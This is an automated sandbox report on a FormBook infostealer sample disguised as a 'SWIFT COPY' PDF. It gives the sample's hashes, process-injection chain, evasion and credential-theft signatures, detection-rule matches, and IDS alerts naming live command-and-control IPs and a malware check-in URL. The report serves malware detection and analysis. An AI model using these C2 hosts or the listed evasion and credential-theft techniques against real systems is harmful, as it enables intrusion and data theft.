Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SWIFT COPY 0028_pdf.exe

Overview

General Information

Sample name:SWIFT COPY 0028_pdf.exe
Analysis ID:1559148
MD5:aa99009ff8c996ccefd78eb8a4ce1d7e
SHA1:4061428787fa914d12ba52bc80af6c1725a2482d
SHA256:4c16a10a2942e6a9383fc241bf4232a087333c383c5a269381300e9036c01178
Tags:exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SWIFT COPY 0028_pdf.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe" MD5: AA99009FF8C996CCEFD78EB8A4CE1D7E)
    • svchost.exe (PID: 6740 cmdline: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • nBMWUKLuWlMJko.exe (PID: 2940 cmdline: "C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasautou.exe (PID: 1340 cmdline: "C:\Windows\SysWOW64\rasautou.exe" MD5: DFDBEDC2ED47CBABC13CCC64E97868F3)
          • nBMWUKLuWlMJko.exe (PID: 3320 cmdline: "C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5708 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4613350413.0000000004B70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2315508419.00000000049A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4613324935.0000000002D70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.4613219723.0000000002D70000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.4602405101.0000000002E50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", CommandLine: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", ParentImage: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe, ParentProcessId: 7088, ParentProcessName: SWIFT COPY 0028_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", ProcessId: 6740, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", CommandLine: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", ParentImage: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe, ParentProcessId: 7088, ParentProcessName: SWIFT COPY 0028_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", ProcessId: 6740, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T08:31:49.721951+010028554651A Network Trojan was detected192.168.2.649872188.114.96.380TCP
                2024-11-20T08:32:13.073358+010028554651A Network Trojan was detected192.168.2.64998976.223.74.7480TCP
                2024-11-20T08:32:26.991329+010028554651A Network Trojan was detected192.168.2.649994163.44.185.18380TCP
                2024-11-20T08:32:40.445647+010028554651A Network Trojan was detected192.168.2.649998172.67.162.1280TCP
                2024-11-20T08:32:53.922706+010028554651A Network Trojan was detected192.168.2.65000385.159.66.9380TCP
                2024-11-20T08:33:07.603228+010028554651A Network Trojan was detected192.168.2.650007103.21.221.480TCP
                2024-11-20T08:33:20.999361+010028554651A Network Trojan was detected192.168.2.650011188.114.96.380TCP
                2024-11-20T08:33:34.314684+010028554651A Network Trojan was detected192.168.2.65001766.29.137.1080TCP
                2024-11-20T08:33:47.638147+010028554651A Network Trojan was detected192.168.2.650021203.161.46.20580TCP
                2024-11-20T08:34:02.362521+010028554651A Network Trojan was detected192.168.2.65002643.155.76.12480TCP
                2024-11-20T08:34:16.117357+010028554651A Network Trojan was detected192.168.2.650030103.224.182.24280TCP
                2024-11-20T08:34:29.348125+010028554651A Network Trojan was detected192.168.2.65003413.248.169.4880TCP
                2024-11-20T08:34:42.532171+010028554651A Network Trojan was detected192.168.2.65003813.248.169.4880TCP
                2024-11-20T08:34:55.824858+010028554651A Network Trojan was detected192.168.2.650043172.67.162.3980TCP
                2024-11-20T08:35:09.015592+010028554651A Network Trojan was detected192.168.2.65004713.248.169.4880TCP
                2024-11-20T08:35:22.429916+010028554651A Network Trojan was detected192.168.2.650051104.21.4.9380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T08:32:05.410049+010028554641A Network Trojan was detected192.168.2.64996676.223.74.7480TCP
                2024-11-20T08:32:07.970724+010028554641A Network Trojan was detected192.168.2.64998676.223.74.7480TCP
                2024-11-20T08:32:10.547590+010028554641A Network Trojan was detected192.168.2.64998776.223.74.7480TCP
                2024-11-20T08:32:19.344001+010028554641A Network Trojan was detected192.168.2.649990163.44.185.18380TCP
                2024-11-20T08:32:21.920061+010028554641A Network Trojan was detected192.168.2.649991163.44.185.18380TCP
                2024-11-20T08:32:24.442541+010028554641A Network Trojan was detected192.168.2.649992163.44.185.18380TCP
                2024-11-20T08:32:32.755875+010028554641A Network Trojan was detected192.168.2.649995172.67.162.1280TCP
                2024-11-20T08:32:35.294691+010028554641A Network Trojan was detected192.168.2.649996172.67.162.1280TCP
                2024-11-20T08:32:37.887957+010028554641A Network Trojan was detected192.168.2.649997172.67.162.1280TCP
                2024-11-20T08:32:47.094329+010028554641A Network Trojan was detected192.168.2.64999985.159.66.9380TCP
                2024-11-20T08:32:49.639800+010028554641A Network Trojan was detected192.168.2.65000085.159.66.9380TCP
                2024-11-20T08:32:52.186643+010028554641A Network Trojan was detected192.168.2.65000285.159.66.9380TCP
                2024-11-20T08:32:59.965616+010028554641A Network Trojan was detected192.168.2.650004103.21.221.480TCP
                2024-11-20T08:33:02.486694+010028554641A Network Trojan was detected192.168.2.650005103.21.221.480TCP
                2024-11-20T08:33:05.036604+010028554641A Network Trojan was detected192.168.2.650006103.21.221.480TCP
                2024-11-20T08:33:13.289060+010028554641A Network Trojan was detected192.168.2.650008188.114.96.380TCP
                2024-11-20T08:33:15.886844+010028554641A Network Trojan was detected192.168.2.650009188.114.96.380TCP
                2024-11-20T08:33:18.423233+010028554641A Network Trojan was detected192.168.2.650010188.114.96.380TCP
                2024-11-20T08:33:26.642780+010028554641A Network Trojan was detected192.168.2.65001466.29.137.1080TCP
                2024-11-20T08:33:29.217437+010028554641A Network Trojan was detected192.168.2.65001566.29.137.1080TCP
                2024-11-20T08:33:31.752384+010028554641A Network Trojan was detected192.168.2.65001666.29.137.1080TCP
                2024-11-20T08:33:39.962605+010028554641A Network Trojan was detected192.168.2.650018203.161.46.20580TCP
                2024-11-20T08:33:42.566078+010028554641A Network Trojan was detected192.168.2.650019203.161.46.20580TCP
                2024-11-20T08:33:45.062014+010028554641A Network Trojan was detected192.168.2.650020203.161.46.20580TCP
                2024-11-20T08:33:54.735361+010028554641A Network Trojan was detected192.168.2.65002243.155.76.12480TCP
                2024-11-20T08:33:57.273456+010028554641A Network Trojan was detected192.168.2.65002343.155.76.12480TCP
                2024-11-20T08:33:59.818741+010028554641A Network Trojan was detected192.168.2.65002543.155.76.12480TCP
                2024-11-20T08:34:08.318850+010028554641A Network Trojan was detected192.168.2.650027103.224.182.24280TCP
                2024-11-20T08:34:10.867578+010028554641A Network Trojan was detected192.168.2.650028103.224.182.24280TCP
                2024-11-20T08:34:13.497498+010028554641A Network Trojan was detected192.168.2.650029103.224.182.24280TCP
                2024-11-20T08:34:21.628824+010028554641A Network Trojan was detected192.168.2.65003113.248.169.4880TCP
                2024-11-20T08:34:24.170562+010028554641A Network Trojan was detected192.168.2.65003213.248.169.4880TCP
                2024-11-20T08:34:26.724768+010028554641A Network Trojan was detected192.168.2.65003313.248.169.4880TCP
                2024-11-20T08:34:34.903506+010028554641A Network Trojan was detected192.168.2.65003513.248.169.4880TCP
                2024-11-20T08:34:37.436227+010028554641A Network Trojan was detected192.168.2.65003613.248.169.4880TCP
                2024-11-20T08:34:39.991492+010028554641A Network Trojan was detected192.168.2.65003713.248.169.4880TCP
                2024-11-20T08:34:48.132791+010028554641A Network Trojan was detected192.168.2.650039172.67.162.3980TCP
                2024-11-20T08:34:50.723072+010028554641A Network Trojan was detected192.168.2.650040172.67.162.3980TCP
                2024-11-20T08:34:53.275913+010028554641A Network Trojan was detected192.168.2.650041172.67.162.3980TCP
                2024-11-20T08:35:01.374225+010028554641A Network Trojan was detected192.168.2.65004413.248.169.4880TCP
                2024-11-20T08:35:03.940299+010028554641A Network Trojan was detected192.168.2.65004513.248.169.4880TCP
                2024-11-20T08:35:06.479706+010028554641A Network Trojan was detected192.168.2.65004613.248.169.4880TCP
                2024-11-20T08:35:14.777692+010028554641A Network Trojan was detected192.168.2.650048104.21.4.9380TCP
                2024-11-20T08:35:17.312999+010028554641A Network Trojan was detected192.168.2.650049104.21.4.9380TCP
                2024-11-20T08:35:19.858913+010028554641A Network Trojan was detected192.168.2.650050104.21.4.9380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T08:32:05.410049+010028563181A Network Trojan was detected192.168.2.64996676.223.74.7480TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.nonpressure.beautyAvira URL Cloud: Label: malware
                Source: http://www.nonpressure.beauty/ymqd/Avira URL Cloud: Label: malware
                Source: http://www.nonpressure.beauty/ymqd/?GR54yHZ8=mPy66x3IfJKracCH7wZR1aUAlhDvAV8zvELzb8KITnbno7Ubu3OHpx/EILO3OYxVnkt90JirtFkeXZQsCCcXJBbLSRzz4hD+Fif5IhUF/AIFPB6kYSO8O2aHFbYKqoGjWs62c28=&9xn=fHadNpk8MVaxAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: SWIFT COPY 0028_pdf.exeReversingLabs: Detection: 39%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4613350413.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2315508419.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4613324935.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4613219723.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4602405101.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4613399783.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2314669018.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2316526821.0000000006480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: SWIFT COPY 0028_pdf.exeJoe Sandbox ML: detected
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nBMWUKLuWlMJko.exe, 00000003.00000002.4611840716.00000000006CE000.00000002.00000001.01000000.00000004.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4602403236.00000000006CE000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: SWIFT COPY 0028_pdf.exe, 00000000.00000003.2154550142.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, SWIFT COPY 0028_pdf.exe, 00000000.00000003.2153324320.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315069087.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2221830371.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315069087.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2219817771.0000000003800000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4613707846.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2322691574.0000000004A7F000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4613707846.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2326045959.0000000004C23000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SWIFT COPY 0028_pdf.exe, 00000000.00000003.2154550142.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, SWIFT COPY 0028_pdf.exe, 00000000.00000003.2153324320.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2315069087.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2221830371.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315069087.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2219817771.0000000003800000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, rasautou.exe, 00000004.00000002.4613707846.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2322691574.0000000004A7F000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4613707846.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2326045959.0000000004C23000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: rasautou.exe, 00000004.00000002.4606460151.0000000003177000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4614264307.00000000053FC000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2619893356.00000000245FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: rasautou.exe, 00000004.00000002.4606460151.0000000003177000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4614264307.00000000053FC000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2619893356.00000000245FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: rasautou.pdbGCTL source: svchost.exe, 00000002.00000002.2314913469.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282220992.0000000003613000.00000004.00000020.00020000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000003.2252387323.000000000081B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: rasautou.pdb source: svchost.exe, 00000002.00000002.2314913469.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282220992.0000000003613000.00000004.00000020.00020000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000003.2252387323.000000000081B000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00966CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00966CA9
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009660DD
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009663F9
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0096EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0096EB60
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0096F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0096F5FA
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0096F56F FindFirstFileW,FindClose,0_2_0096F56F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00971B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00971B2F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00971C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00971C8A
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00971F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00971F94
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E6CC00 FindFirstFileW,FindNextFileW,FindClose,4_2_02E6CC00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4x nop then xor eax, eax4_2_02E5A080
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4x nop then pop edi4_2_02E5E774
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4x nop then mov ebx, 00000004h4_2_04CC04D8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49872 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49966 -> 76.223.74.74:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.6:49966 -> 76.223.74.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 163.44.185.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 163.44.185.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 76.223.74.74:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49994 -> 163.44.185.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 172.67.162.12:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49989 -> 76.223.74.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50003 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50000 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50021 -> 203.161.46.205:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 203.161.46.205:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 163.44.185.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 43.155.76.124:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 43.155.76.124:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50035 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 172.67.162.12:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50032 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50033 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 76.223.74.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50049 -> 104.21.4.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50037 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50011 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 66.29.137.10:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50040 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49998 -> 172.67.162.12:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50036 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50018 -> 203.161.46.205:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50030 -> 103.224.182.242:80
